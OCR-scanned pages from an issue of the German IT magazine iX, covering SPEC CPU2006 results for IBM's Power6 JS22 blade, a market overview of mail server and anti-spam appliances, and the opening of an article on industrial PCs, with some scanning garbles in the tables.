Partnern an ein Power6-System mit 32 
GByte heranzukommen, bleibt nur der 
Blick in die Tabellen bei der SPEC. 
Ausschlaggebend sind die Base-Wer- 
te, da sie aufgrund ähnlicher Bedin- 
gungen entstehen, wie sie bei der 
Programmentwicklung von kommer- 
ziellen Applikationen gelten. Peak- 
Werte gehören in die Klasse der olym- 
pischen Disziplin. Hier verwenden die 
Hersteller Optimierungen, die allen- 
falls jemand einsetzt, der seinen eige- 
nen Sourcecode in- und auswendig 
kennt. Inzwischen zeigt die SPEC in 
ihrer Übersicht per Default nur noch 
Peaks. Man muss vorher auf „All 
SPEC CPU2006“ per „go“ umstellen. 

Als Erstes fällt auf, dass Bull und 
IBM nur wenige Speed-Werte (Single 
Runs) veröffentlicht haben. Die J22 
taucht erst bei Rate auf. Für ein System 
mit 4,7-GHz-Power6 erzielt IBM 17,8 
unter AIX und 17,5 unter SLES10 SP1. 
In beiden Fällen verwendeten die Tes- 
ter nur 32-Bit-Code und für AIX die 
ältere SL-Version. Außerdem halfen 


Ergebnisse der CPU2006 
SPECint_base2006' 
112 
En 10,1 
SPECint_rate_base2006? 
778 
772 


SPECfp_rate_base2006? 
SEAARLIEIEL ER A 67,8 


65,7 


IBM 1522 AIX 6.1 
N IBM 1522 SLESIO 


Imit -O4 auf 16-MByte-System unter AIX 6.1 von 
iX generierte Binaries; ? für 4 Cores mit -O5 auf 
32-GByte-System unter AIX 5L V5.3 von IBM. 
Übersetzt mit XL-Compilern V9.0. 


Optionen: xlc -galias=noansi -galloca- 
gipa=noobject, xIC -grtti=all-qipa=noobject, 
xlf -glargepage-gsmallstack=dynlenonheap - 
galias=nostd 


sie unter Linux mit der Smart-Heap- 
Library von Microquill nach, wie übri- 
gens allen anderen Hersteller auch. 
Bricht man den SPECint_base2006- 
Wert auf 4,0 GHz herunter, kommt 
man für AIX auf 15,1, was immer 
noch zu weit weg von den wenig op- 
timierten 11,2 liegt; Entsprechendes 
gilt für Linux. 

Im Integer-Speed (SPECint_base 
2006) muss sich der Power6 mit sei- 
nen 17,8 gegenüber einer X5460-CPU 
mit 3,16 GHz von Intel in einer Sun 
Fire geschlagen geben, die trumpft mit 
24,3 auf. Ein deutlich anderes Bild 
entsteht beim Gleitkommarechnen: 
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Hier tritt der Power6 im Speed-Run 
gegen eine 2,4 GHz schnelle SPARC64 
VI mit 21,7 an und landet noch hinter 
Intels Core 2 Extrem (21,4) und Xeon 
(21,2) bei 18,7 SPECfp_base2006. 
Die Sparcs holen hier unter Solaris 
den Pokal, dichtauf sind Intels-CPUs 
unter Windows Vista64 Ulimate und 
SLESIO. 


Erreicht eine 
hohe Skalierung 


Beim Multitasking kann der Power 
hingegen Bestzeiten einfahren. Mit 
acht Kopien auf vier Cores belegt er 
mit Abstand die ersten Plätze: 108 
SPECint_rate und 102 SPECfp_rate. 
Verfolger Intels Xeon liegt mit 42,5 
respektive 31,7 weit zurück. Doch die 
Sache hat einen Haken: Andere Pro- 
zessoren sucht man hier vergebens, 
denn acht Kopien auf vier Cores sind 
nur dann sinnvoll, wenn die CPU- 
Hardware Threads unterstützt. Intel 
hat aber bei seinen neuen Core-CPUs 
das Hyper Threading aufgegeben. 
Schaut man allein auf Messungen mit 
vier Kopien auf vier Cores, schließt 
Intels Xeon X5260 mit 70,1 und 51,0 
etwas auf. Der Power6 skaliert mit 71 
und 68 % (int und fp) deutlich besser 
als alle anderen Prozessoren. Mit 4,7 
GHz gegenüber 3,3 beim Xeon läuft 
er aber erheblich hochtouriger. Un- 
schlagbar ist der Power6 derzeit bei 
der Skalierung im SPECint_rate2006: 
Hier liegt er bei fast 100 %, selbst bei 
den Base-Resultaten. 

Das heißt aber nicht, dass der Pow- 
er6 erheblich mehr Energie verbraucht 
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als die Gegenspieler: der Power6 liegt 
bei 100, der Xeon bei 120 und Suns 
UltraSparc TI bei 180 Watt. Damit ist 
der Power6 nicht nur der Schnellste 
seiner Klasse, sondern auch der Ener- 
giesparendste. Noch ist er allerdings im 
Ranking der Systeme im SPECpower 
nicht zu finden. 


Fazit 


Mit dem Power6 hat IBM einen großen 
Schritt nach vorne geschafft. Allein die 
mehr als doppelt so hohe Taktrate 
gegenüber dem Vorläufer Power5+ 
bringt deutlich mehr Rechenleistung. 
Mit AIX 6 und den XL-Compilern 
können Entwickler Leistung aus dem 
Prozessor herauskitzeln, müssen dafür 
aber für den Hauptspeicher tief in die 
Tasche greifen. Außerdem brauchen sie 
ein solches System, um für kleinere, 
auf 16 GByte beschränkte Software 
entwickeln zu können. Zwar sind in- 
zwischen die JS22 für 32 GByte dekla- 
riert, benötigen aber dafür 8-GByte- 
DDR2-SDRAM-Module — teuer und 
schwer zu beschaffen. Die jüngst vor- 
gestellte JS12 mit ihren acht Memo- 
ryslots könnte einen Ausweg bieten, 
schlägt aber mit 3350 Euro zu Buche. 
Mit 32 GByte Hauptspeicher und zwei 
73-GByte-Platten kommt man auf 
9170 Euro. 

Offensichtlich gibt es wegen der 
notwendigen großen und teueren Spei- 
chermodule derzeit Schwierigkeiten, 
an ein Power6-Systeme mit 32 GByte 
heranzukommen. Dass gute Optimie- 
rungen nur für wissenschaftliches 
Rechnen von Bedeutung sind, stimmt 


Seitenflügel: Vier Memorybänke begrenzen 
die Ausbaubarkeit derzeit auf 16 GByte SDRAM. 
Im oberen Slot sitzt der Serviceprozessor, im 
hinteren Teil ist noch Platz für ein PCI-Modul 
(Abb. 1). 


nicht ganz: Selbst bei den heute üb- 
lichen Einsatzbereichen von Blades 
als Server spielt schon allein das Ver- 
und Entschlüsseln eine wichtige Rol- 
le, und dort geht es vor allem um Re- 
chenleistung. (rh) 


Literatur 


[1] Ralph Hülsenbusch; UltraSparc; 
Der Niagara-Fall; Suns T5220 mit 
T2-Prozessor; iX 4/08, S. 104 

[2] Andreas Leibl; Prozessoren; 
Round up; Neue Unix-Server 
von IBM mit Power5; 
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J$22 Powerö-Blade 


Hardware: zwei Power6-CPU, zwei Kerne mit 
je zwei Hardware-Threads, 4,0 GHz, 4 MByte 
L2-Cache pro Core; 16 GByte ECC chipkill 
DDR2-SDRAM; 73 GByte SAS-Laufwerk, 

2,5 Zoll; Netzverbindungen und Stromversor- 
gung über Bladecenter H.; integrierter System- 
management Controller; Power Hypervisor 


Software: AIX 6, SLES 10 (RHEL 4.6 zerti- 
fiziert); XLl-Compiler 9.0 


Hersteller: IBM [www.ibm.com) 
Preis: 7620 Euro (Teststellung) 


© solide Verarbeitung 
© gute Skalierung der CPU 


© gutes Energie-Rechenleistungsverhältnis 


© hoher Speicherbedarf der Compiler 
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REPORT 


E-Mail 


er vor der Aufgabe steht, für 
seine Firma einen Mailser- 
ver (genauer „Mail Transfer 


Agent“, MTA) einzurichten, hat eine 
große Auswahl an Soft- und Hard- 
ware. Linux-Distributionen und Unix- 
Derivate enthalten Sendmail oder kom- 
patible Mailserver wie Postfix oder 
Exim; solche wickeln bis heute einen 
Großteil des weltweiten E-Mail-Ver- 
kehrs ab. Darüber hinaus enthalten ei- 
nige kommerzielle Bürosoftwarepake- 
te, etwa Microsofts Exchange, IBMs 
Domino, Kerios Mailserver und ande- 
re Groupware eine MTA-Komponente. 

Eine weitaus größere Auswahl be- 
steht in Sachen Hardware, denn prak- 
tisch jeder aktuelle Desktop-PC oder 
ein vergleichbarer Rack-Server hat 
mehr als genug Leistungsreserven, 
mithilfe einer Mailserver-Software 
Hunderten von Anwendern das be- 
liebte Internet-Medium zur Verfügung 
zu stellen. 

Nach der Entscheidung für die ge- 
eignete Kombination aus Soft- und 
Hardware sowie deren Inbetriebnahme 
geht es ans Konfigurieren. Das bedeu- 
tet heutzutage vor allem, den Miss- 
brauch des Sytems zu verhindern und 
die Anwender vor Unerbetenem zu 
schützen. E-Mail-Verantwortliche müs- 
sen sich zwangsläufig um das Ausfil- 
tern von Datenmüll kümmern, denn 
über 90 Prozent aller E-Mails transpor- 
tieren unerwünschte Werbung, Schad- 
programme oder „vergiftete“ URLs. 
Auch unter kostenlosen und kommer- 
ziellen Spam- und Virenfiltern besteht 
eine reiche Auswahl. Eigentlich gibt es 
also mehr als genug Möglichkeiten für 
kompetente Postmaster, die Mail-Be- 
dürfnisse ihrer Arbeitgeber zu erfüllen. 


Pizzaschachteln 
im Serverschrank 


Aber anscheinend gibt es zu wenige 
solcher Mail-Admins - oder sie sind 
zu teuer. Denn neben den selbst zu 
administrierenden Produkten hat sich 
ein ansehnlicher Markt für „schlüssel- 
fertige“ Kombinationen aus Soft- und 
Hardware entwickelt. Für solche „Ap- 
pliances“ — eine Bezeichnung, die 
simple Haushaltsgeräte einschließt — 
finden sich viele Käufer. Allein Bar- 
racuda Networks hat nach eigenen 
Angaben 50 000 Geräte bei Kunden 
aufgestellt. 

Solche Appliances sind üblicher- 
weise in 19-Zoll-Gehäusen unterge- 
bracht, die eine Höheneinheit, also gut 
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Fertiggeräte für den E-Mail-Verkehr 


Vorbereitet 


Bert Ungerer 


Sowohl das Einrichten als auch das Betreiben von Mailservern 
gelten als komplex, fehlerträchtig und nicht zuletzt als rechtlich 
schwieriges Terrain. Davon profitieren Hersteller, die fertige 
Kombinationen aus Hard- und Software anbieten - inklusive 
Spam- und Virenfilter, denn ohne die geht praktisch nichts mehr. 
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44 mm im Serverschrank belegen. Ei- 
ne Ausnahme bildet der Business Ser- 
ver von Collax mit seinem Tower-Ge- 
häuse (zu Komplett-Servern siehe auch 
S.48 in dieser Ausgabe). Bei manchen 
Herstellern finden sich vom Kunden 
leicht zu ersetzende oder aufzurüsten- 
de Standardkomponenten, andere las- 
sen nur den eigenen Service speziell 
„gebrandete“ Festplatten oder Spei- 
cherriegel ein- und umbauen. Bei sol- 
chen Geräten wird es entsprechend teu- 
rer, wenn sich herausstellt, dass die 
ursprünglich geplante Kapazität nicht 
ausreicht. 


E-Mail bietet von 
sich aus Fehlertoleranz 


In der Regel sind die Geräte mit zwei re- 
dundant angebundenen (RAID 1) Fest- 
platten ausgestattet. Andere doppelt 
ausgelegte Baugruppen, etwa Netztei- 
le, finden sich selten: So beliebt und 
wichtig E-Mail auch ist, erfordern ge- 
rade Mailserver relativ wenig Vorsor- 
ge gegen Ausfälle. 

Auch wenn es Anwender gewohnt 
sind, E-Mails binnen Sekunden zu er- 
halten: Gerade dieses Medium stellt 
weder Echtzeit- noch Hochverfügbar- 
keitsanforderungen. Bei E-Mail han- 
delt es sich ganz wie beim physischen 
Vorbild, der Papierpost, um ein „Store- 
and-Forward“-Medium. Es stellt le- 
diglich sicher, dass auf dem Weg vom 
Absender zur Inbox des Empfängers 
keine Nachricht verloren geht, aber 
nicht, dass eine Mail innerhalb einer 
bestimmten Zeit ankommt. 

Fällt eine Station vorübergehend aus, 
puffert der in der Zustellkette vorange- 
hende Mailserver den Datenverkehr in 
einer Warteschlange und unternimmt 
mitunter einige Tage lang Zustellver- 
suche (auch bei niedriger priorisierten 
Zielservern, falls vorhanden), bevor er 
es aufgibt und den Absender darüber 
informiert. Als das E-Mail-Protokoll 


SMTP vor 26 Jahren entstand, waren 
nicht einmal Standleitungen die Regel, 
geschweige denn Hochverfügbarkeit. 

Die meisten Appliance-Hersteller 
statten ihre Rack-taugliche, doch PC- 
ähnliche Hardware mit Linux und des- 
sen Mail-Komponenten aus. Beliebt 
sind Postfix für den Mailtransport und, 
falls die Appliance selbst E-Mails spei- 
chert, Cyrus als IMAP-Server. Einige 
Geräte arbeiten jedoch als reines Relay 
und setzen also einen separaten Mail- 
box-Server in der Firmeninfrastruktur 
voraus. Die Betriebssystembasis ist aus 
Leistungs- oder auch Sicherheitsgrün- 
den bei allen mehr oder weniger stark 
modifiziert, sodass offizielle Linux-Up- 
dates nicht zu gebrauchen sind. Für die 
in den Geräten arbeitenden Spezialdis- 
tributionen muss der Anwender darauf 
vertrauen, dass sicherheitskritische Up- 
dates schnell genug den Weg in das 
Fertiggerät finden. 

Für die Spam- und Virenfilterung 
kommen neben den Open-Source-Pro- 
dukten Spamassassin und ClamAV 
häufig proprietäre und entsprechend 
teurere Produkte zum Einsatz. Bei 
Godot und Sendmail findet sich zum 
Beispiel Elevens eXpurgate — ein 
Spam- und Virenfiltersystem, das 
Kunden, darunter große Provider, 
sonst als reine Dienstleistung in An- 
spruch nehmen. 


Randbedingungen 
müssen erfüllt sein 


Steht die Appliance erstmals im eige- 
nen Serverraum unter Strom, geht es 
zunächst ans Konfigurieren. Vor der 
Anschaffung sollten sämtliche Details 
geklärt sein. Manche Kleinigkeiten 
können sich zu entscheidenden Hemm- 
nissen auswachsen. So sollten sich et- 
wa die IP-Adressen, Netzmasken und 
Default-Routen so einstellen lassen, 
dass sie zum eigenen LAN und Inter- 
net-Anschluss passen. Außerdem ist 


A-TRACT 


© Vorkonfigurierte Kombinationen aus Hard- und Software können E-Mail-Administra- 
toren einen Teil der Konfigurations- und Wartungsarbeit abnehmen. 


© Auf der PC-ähnlichen Hardware der Appliances läuft meistens ein Linux-Derivat, für 
dessen Wartung allein der Appliance-Hersteller verantwortlich ist. 


© Auch eine „Fertiglösung” entbindet Postmaster nicht davon, sinnvolle Einstellungen 
vorzunehmen, die den Verdruss über die Spam-Plage nicht nur bei regulären 
Anwendern, sondern auch bei Unbeteiligten in Grenzen halten. 
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sicherzustellen, dass der bevorzugte 
Administrationsweg (etwa per SSH 
oder über einen eigenen Management- 
Anschluss) Unterstützung findet. 

Nicht nur die Netzanschlüsse, auch 
der in der Appliance verpackte Mailser- 
ver will Konfiguriert sein. Idealerweise 
sollte er nicht zustellbare E-Mails 
(Spam, Viren oder nicht existierende 
Empfänger) gar nicht erst annehmen. 
Damit entlastet er nicht nur sich selbst, 
sondern auch sämtliche nachgelagerten 
Systeme. Als entscheidenden Vorteil 
kann das Abweisen für sich verbuchen, 
dass im eigenen Netz keine „Bounces“ 
entstehen können, also etwa Benach- 
richtigungen über die Nichtzustellbar- 
keit an die Envelope-From-Adresse, 
die beliebig gefälscht sein kann. Die 
Verantwortung für die E-Mail bleibt 
durch das Abweisen (Reject) beim ab- 
sendenden Mailhost. 

Doch schon die Überprüfung, ob 
der vorgesehene Empfänger überhaupt 
existiert, scheint vielen Mailserver-Be- 
treibern Schwierigkeiten zu bereiten. 
Die lästige Folge davon sind Bounce- 
Mails mit Unzustellbarkeitsbenachrich- 
tigungen (Non-Delivery Report, NDN), 
die in alle Welt hinausgehen und im 
Falle von Spam und Viren allein (bis 
dahin) Unbeteiligte belästigen. Ange- 
sichts der Tatsache, dass der Anteil er- 
wünschter Mails bei unter 10 Prozent 
liegt, sollten Admins sicherstellen, dass 
ihr Mailserver (ob in einer Appliance 
oder nicht) noch während des SMTP- 
Dialogs feststellt, ob ein Empfänger 
existiert, etwa per Abfrage eines Ver- 
zeichnisdienstes. Im Falle ungültiger 
Adressen sollte der MTA die Mail gar 
nicht erst annehmen. 


Ungeprüftes Annehmen 
schafft Verdruss 


Ähnliches gilt für die Analyse der 
Mail-Inhalte. Doch viele Mailserver 
sind so konzipiert, dass sie E-Mails 
zunächst annehmen und dann erst auf 
Viren und Spam filtern. Laut Ironport 
besteht anderenfalls die Gefahr von 
Denial-of-Service-Angriffen, denn das 
Filtern dauert nun einmal eine gewisse 
Zeit. Immerhin teilte Ironport auf die 
Umfrage zu der vorliegenden Markt- 
übersicht (siehe Tabelle am Ende des 
vorliegenden Artikels) von sich aus 
mit, dass das Einschalten von Bounces 
auf erkannte Spam- und Virenmails 
nicht empfehlenswert sei. Problembe- 
wusstsein auch bei Reddoxx: Der Her- 


iX 6/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


Im umkämpften 
Markt für 
kombinierte E-Mail- 
Hard- und Software 
verkaufen sich 
Ironport- 
Appliances derzeit 
besonders gut 
(Abb. 1). 


steller teilte mit, dass sich bei der Ap- 
pliance SpamFinder die Bounces ab- 
schalten lassen, ohne dass explizit da- 
nach gefragt worden war. 

Auch Barracuda Networks setzt auf 
das Annehmen vor dem Filtern, mit der 
Begründung, dass die SMTP-Sitzung 
so schnell wie möglich beendet sein 
sollte. Doch während Ironport davon 
abrät, bei erkannten Spam- und Viren- 
mails Bounces zu generieren, sieht sich 
Barracuda durch die RFCs dazu ver- 
pflichtet, die Grundeinstellung seiner 
Appliances so zu wählen — neben der 
großen Verbreitung der Geräte ein 
Grund dafür, dass viele eigentlich Un- 
beteiligte laufend E-Mails mit Betreff- 
zeilen wie „Message you sent blocked 
by our bulk email filter“ erhalten, denn 
Spam- und Virenmails tragen selten au- 
thentische Absenderadressen. 

Dass man unerwünschte Mails aber 
auch abweisen kann, statt Bounces in 
alle Welt zu versenden, zeigt unter an- 
derem die Sponts-Appliance von der 
iKu AG. 

So verlockend die Angebote der Ap- 
pliance-Hersteller sind, ein Grundver- 


1 IronPort Systems 
[| Secure Computing Corp. 
Barracuda Networks Inc. 
Symantec 

EI Sorderware 


4,4% [] andere 


Quelle: Gartner, 2007 


ständnis für das eigene Unternehmens- 
netz und das Medium E-Mail setzen 
auch sie voraus. Hier sind die Beratung 
seitens der Hersteller und die Grund- 
einstellungen der Geräte entscheidend. 
Spam- und Virenmails mit automatisch 
erzeugten Bounce-Mails zu beantwor- 
ten, sollte heutzutage nicht mehr zu den 
Grundeinstellungen gehören. 


Fazit und Ausblick 


Noch ist der Markt für Mailserver- 
und -Filter-Fertiggeräte vielfältig. Ei- 
ne Konsolidierung findet jedoch be- 
reits statt und hat ihren vorläufigen 
Höhepunkt mit dem Kauf von Ironport 
durch Cisco im vergangenen Jahr er- 
reicht. Kaum dass diese Übernahme 
abgeschlossen war, gab es an anderer 
Stelle einen Paukenschlag: Google er- 
warb den E-Mail-Dienstleister Postini. 
Die Musik spielt mittlerweile auch 
dort, wo die Unternehmen selbst gar 
nichts mehr mit eigenen Mailservern 
zu tun haben wollen, sondern den 
Dienst komplett zu Anbietern wie 
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Laut dem Mailfilter-Dienstleister Eleven, der diese erschreckende Statistik 
erstellt hat, ist ein Ende der Spam-Flut nicht in Sicht. Eine Einschätzung, die 
leider den Erfahrungen vieler E-Mail-Anwender entspricht (Abb. 2). 
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Hersteller oder Marke 
Web 
E-Mail 


Produkt (Beispiel 
für 200 Anwender) 


Hardware 


Aufrüstung durch Kunden 
möglich 

Betriebssystem/ 
Mailsoftware 
E-Mail-Funktionen 
externe Blacklists einbindbar 
Spam-Filter 


AN-Engine 
Rejects nach Filterung 


weitere Mechanismen 
der Spam- und Viren- 
behandlung 


Bounces auf erkannte 
Spam-/Virenmails 
Empfängerverifizierung 


Filterregeln durch 
Anwender 
Anwender-ilterregeln 
durch Administrator 


Postfachserver integriert 
Systemmanagement 
SSH übers LAN/Internet 


separater Management- 
Anschluss 


Hersteller kann auf 
E-MailVerkehr oder 
Inhalte schließen 
Reporting für Admins 


Anwenderschnittstellen 


Preisbeispiel (200 Anwender) 


Besonderheiten, Extras 


Barracuda Networks 
www.barracuda.com 
obareiss@barracuda.com 


Spam Firewall 300 


1 HE, 1 Ethernet- 
Anschluss (10/100) 


Open Source 
v 
v 


Markieren, Quarantäne 


v (abschaltbar) 
LDAP, SMIP 
v 


v 


-W 
(nur durch den Service) 


Web, E-Mail 


E-Mail-Reports, 
Qutlook-Plug-in, Web 


2399 Euro + jährlich 
499 Euro 
automatisierte Backups, 
halbstündliche Updates, 
Echtzeit-Virenschutz, 
Verschlüsselung 


Clearswift GmbH 
www.clearswift.de 
info@clearswift.de 


MIMEsweeper 
Dell-Hardware, 
virtualisiert auf 


eigener Hardware oder 
für VMware ESX Server 


v 

Linux, Sendmail 
v 

eigener 
Kaspersky 

v 


Markieren, Quarantäne 


v 


LDAP, ADS, Domino, 
statische Liste 


v 


RZ 
(IP-Adressen festlegbar) 


wahlweise einer der 
LAN-Ports 


Web, div. Exportformate 


je nach Rollendefinition 


4600 Euro + jährlich 
2100 Euro 
zeitgesteuertes Backup, 
zentrales Management 
mehrerer Appliances, 
automatisierte Updates 


Collax GmbH 
www. collax.com 
info@collax.com 


Collax Business Server 
>> Office Power 


Tower-Gehäuse, Intel 
E6420, 2 GByte RAM, 
2 x 160 GByte HD, 
2 x LAN (Gi) 


v 


Linux mit 2.6er-Kernel, 
Postfix, Cyrus 


v 
Spamassassin 


Kaspersky, Antivir 


Markieren, Quarantäne, 
Verwerfen, Bearbeitungs- 
Queue 


LDAP 


Web, PDF 


Web, Webmailer 


3260 Euro + jährlich 
2345 Euro 

Unified Messaging, 
Backup/Restore, reine 
Softwareversion 
erhältlich 


CP Secure GmbH 
www.cpsecure.de 
info@cpsecure.de 


(S6-110 
1 HE, P4 Celeron 
2 GHz, 512 MByte RAM, 


40 GByte HD, 3 x LAN 
10/100 


Linux 


Commtouch (optional), 
eigene Heuristik 
Kaspersky, CP Secure 
NG 


Markieren, Quarantäne 


-N 
(SSL/nur Service) 


v 


Web, TXT, CSV 


Web, E-Mail 


2990 Euro + jährlich 
897 Euro (ab 2. Jahr) 
transparentes Scannen 
(kein MIA); Commtouch 
(15 % Aufpreis) 


godot GmbH 
www.godot.de 
vertrieb@godot.de 


go.mail Security 

Gateway 

] HE, Opteron 1210, 

4 GByte RAM, 2 x 250 
GByte HD, 2 GE-Anschlüsse 


NG 

90.05, Postfix, Cyrus 
eXpurgate 

Avira Antivir 

NG 

Markieren, Quarantäne 
(Public IMAP Folder), 
Umleiten 


v 


LDAP, ADS 


v 


FRE 
(Service; 
Kunden eingeschränkt) 


Web, E-Mail, 
Logdateien 
Web 


8500 Euro + jährlich 
6000 Euro (ab 2. Jahr) 
Virenausbruchserkennung, 
Webmailer und Firewall 


iKu AG 
www.sponts.de 
sponts@iku-ag.de 


Sponts/Complete 


1 HE, Intel Core 2 Duo 
E4500, 2,2 GHz, 1 GByte 
RAM, 2 x 250 GByte HD 


v 


Linux mit 2.6er-Kernel, 
Sponts 


v 
eigene Heuristik 


Avira, Kaspersky, 
Sophos, ClamAV 
v 


Markieren, Zustellen 
trotz Reject, fallweise 
Greylisting, Teergrubing 


SMIP, statische Liste 


v 


Web, E-Mail, CSV 


Web, E-Mail 


4260 Euro + jährlich 
1090 Euro 
Online-Restore über 
Web-Interface, SQL- 
Interface, Active-Active- 
(luster-fähig 


Messagelabs, Antispameurope, Eleven 
oder eben Postini auslagern. Angesichts 
der Tücken, die das Mailgeschäft birgt, 
ein sicherlich attraktives und zukunfts- 


[2] Lukas Grunwald, Bert Ungerer; 
Mailmaschine; Ironports Messaging 
Gateway Appliance C60; 

iX 10/2004, S. 78 


[5] Andreas Erbe, Christian Schommer; 
Tunnelstation; Antispam-Appliance 
auf Open-Source-Basis; iX 1/2006; 
S. 96 (über Barracudas Spam 


fähiges Geschäft. (un) [3] Lukas Grunwald; Abweisend; Firewall 600) 
Antispam-Appliance für den [6] Bert Ungerer; Eingeschränkt; IP- 
Literatur Mittelstand; iX 12/2004, S. 60 Blacklists gegen unerwünschten 


Datenverkehr; iX 4/2007; S. 102 
[7] Christoph Puppe; Leidtragende; 
Spam aussortieren als 
Dienstleistung; iX 8/2007, S. 72 
(Eleven vs. Antispameurope) 


(über Sponts von iKu) 

[4] Lukas Grunwald; Lautpost; 
Antispam-Appliance von 
3Com auf Borderware-Basis; 
iX 7/2005, 8.84 


[1] Lukas Grunwald, Bert Ungerer; 
Nachrichtensperre; Borderwares 
Mail-Firewall MXtreme; 

iX 7/2004, S.56 
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Intra2net AG IronPort Systems Reddoxx GmbH Sendmail GmbH Sonicwall Sophos Telco Tech GmbH underground_8 gmbh 
www.intra2net.com www. ironport.de www.reddoxx.de www.sendmail.com www. sonicwall.com www.sophos.de www.telco-tech.de www.underground8.com 
info@intra2net.com de-info@ironport.com sales@reddoxx.com germany@sendmail.com germany@sonicwall.com info@sophos.de info@telco-tech.de  office@underground8.com 
Intranator Appliance 1150 SMB Sentrion MP 301 Email Security 300 ES1000 LiSS 3000+ Limes AS 500 
Pro 250+ Filter-Modul 
1 HE, Intel Xeon 3075, 1 HE, Intel, 2 x 80 1 HE, 3,0 GHz, 1 HE, Intel Dual Core, 1 HE, 2,66 GHz, Celeron D 2,53 GHz, 1 HE, 2,4 GHz Core 1 HE, Intel Celeron 
4 GByte RAM, GByte HD, 2 x 512 MByte RAM, 8 GByte RAM, 2 x 146 1 GByte RAM, 1 GByte RAM, 2 Duo, 512 MByte 2 GHz, 1 GByte RAM, 
2 x 500 GByte HD, LAN (GE) 2x 75 GByte HD, GByte HD (15.000/min), 80 GByte HD 160 GByte HD, RAM, 80 GByte HD, 80 GByte HD, 4 x LAN 
3 x LAN (6E) 2 x AN (GE) 5x LAN, tedundante 2 x LAN (GE) 6.x LAN (GE) (10/100) 
Stromversorgung 
v = = = = = v = 
Intranator Linux Async0S Linux mit 2.4er-Kernel Sentrion MPE 3.1 kA. FreeBSD-Variante, Linux mit 2.6er- Ubuntu-Variante, 
(2.6er), Postfix, Cyrus Postfix Kernel, qmail Postfix 
w = NG v v eigene NG NG 
Spamassassin eigener eigener Cloudmark, Commtouch, eigener eigener eigener (Saucer) Spamassassin/eigener 
eXpurgate 
F-Secure integriert McAfee, Sophos, Virus ClamAV McAfee Kaspersky, McAfee eigene Avira, ClamAV ClamAV, Kaspersky 
Qutbreak 
= = NG NG NG = NG = 
Markieren, Quarantäne, Quarantäne, Markieren, Quarantäne Markieren, Quarantäne, Markieren, Quarantäne, Markieren, Markieren, Markieren, 
Umleiten TrafficBegrenzung TraffieBegrenzung Umleiten, Bounces, Quarantäne Quarantäne Quarantäne 
Traffic-Begrenzung, 
Verwerfen 
- v (nicht empfohlen)  (abschaltbar) v NG NG v v 
LDAP, ADS, SMIP LDAP, ADS, NDS, Lotus ADS, Domino, OpenlDAP LDAP, ADS, Domino etc. alle LDAP-basie- ADS, LDAP, — (LDAP, ADS 
Notes etc. renden, SMIP eDirectory angekündigt) 
v = - NG v .- = - 
NG NG NG NG NG NG - NG 
% = = v = = = = 
v/v (Senic, vW vW vW -/- -W - - 
wenn autorisiert,; (falls vom Kunden (nur vom Service) (nur Service, auf 
Kunde optional) gewünscht) Kundenwunsch) 
- v - Dell Remote Access - v wahlweise einer - 
Controller der LAN-Ports 
- Statistiken, falls vom - - nur Statistik v - - 
Kunden gewünscht (auf Kundenwunsch) 
Web, E-Mail Web, E-Mail (PDF), Windows-GUI Web GUI, E-Mail (PDF) Web, Exportfunktion Web, E-Mail Web, E-Mail 
SSH, SNMP 
Web, E-Mail Web, E-Mail Windows-GUl, E-Mail, Web, E-Mail Web, E-Mail Web, E-Mail Web — (Quarantäne- 
Plug-in für Outlook ab Zugriff angekündigt) 
2000 
6790 + jährlich 1250 3750 Euro + jährlich ab 2990 Euro + jährlih auf Anfrage 2795 USD + auf Anfrage 4000 Euro, keine 2290 Euro + optional 
Euro ab 2. Jahr 1650 Euro (ab 2. Jahr) 790 Euro jährlich 640 USD laufenden Kosten jährlich 499 — 838 Euro 
Webmailer, 12 Monate E-Mail-Verschlüsselung Challenge-Response- S/MIME, RPost, IM statistische Analysen „Proactive Option: Cobion- Greylisting 
Updates inkl. Verfahren, VMware- für „Time Zero Monitoring“ URI-Filterung, 
Version; Verschlüsselung Protection“ enthalten Firewall, IPS, VPN 
und Archivierung optional 
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Besonderheiten von Industrie-PCs 


Auf Montage 


Axel Urbanski 


Ein Blick über den Zaun in Richtung x86 Industrie-PC lohnt 

sich, denn dort gibt es Altbekanntes und Neues zu entdecken. 
Solche Systeme müssen ihre Dienste oft in belasteter Umgebung 
verrichten, was besondere Forderungen an sie stellt. 


genen Markt, in dem spezielle Spiel- 
regeln gelten. Er teilt sich in drei 
Hauptbereiche ein: 
— Single Board Computer, 
— Systeme mit ITX/ATX-Mainboards 
und 
— Rechner, die Backplanes nutzen. 
Zu den Gemeinsamkeiten zählt vor al- 
lem die Verwendung von Chips für den 
Embedded-Markt. Intel ist bei den 
CPUs und Chipsets Marktführer. Der 
Grund liegt in den langen Liefergaran- 
tien für die Komponenten, wie sie in 
dem Marktsegment gefordert sind. 
Während der Embedded World 2008 
hatte Intel den Verfügbarkeitszeitraum 
auf sieben Jahre erhöht. VIA spielt mit 
seinen C3- und C7-CPUs nebst passen- 
den Chipsätzen mit und garantiert wie 


I ndustrie PCs (IPCs) haben ihren ei- 
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AMD für seine Prozessoren fünf Jahre, 
Hersteller kompletter Systeme können 
daher ähnliche Zusagen für die Liefer- 
barkeit geben und ihre Produkte deut- 
lich länger am Markt halten als bei her- 
kömmlichen PCs üblich. 


Technische Neuerungen 
mit Bedacht 


Ohne Weiteres kann man heute noch 
Mainboards für den Pentium III (PIII) 
mit dem in der PC-Szene einst belieb- 
ten BX-Chipset und passenden CPUs 
bekommen. Neben den VGA- und 
DVI-Anschlüssen gibt es eine direkte 
Ansteuerung von LCD-Panels auf vie- 
len Boards. Ältere verwenden einen 
TTL-Anschluss (24 Bit), neuere liefern 


die Grafik via LVDS (Low Voltage 
Differential Signaling) an das Display. 
Hierfür greifen die Hersteller auf die 
im Chipset integrierten oder einfache 
Module zurück, wie sie bei Servern 
üblich sind. 

Die Mehrheit der Boards besitzt ei- 
nen Steckplatz für Flash-Speicher, ent- 
weder als DOC (Disk on Chip) von 
M-Systems oder in Form von CF- 
Adaptern (Compact Flash). Passende 
CF-Karten stellen eine Alternative zu 
Festplatten dar und sind deshalb über 
den Sockel an den IDE-Bus ange- 
schlossen. Die DOCs dienen ebenfalls 
als Festplattenersatz, der 32-polige 
DIL-Sockel (Dual In-line Package) be- 
nutzt allerdings nicht den IDE-Bus, 
sondern greift auf ISA/PCI-Bus zu. Die 
Technik blendet den Flash-Speicher in 
einem 8 KByte großen Fenster in den 
Hauptspeicher ein. Sowohl Linux als 
auch Windows 2000 und XP können 
mit den DOCs umgehen; derzeit sind 
16 bis 1024 MByte große Module am 
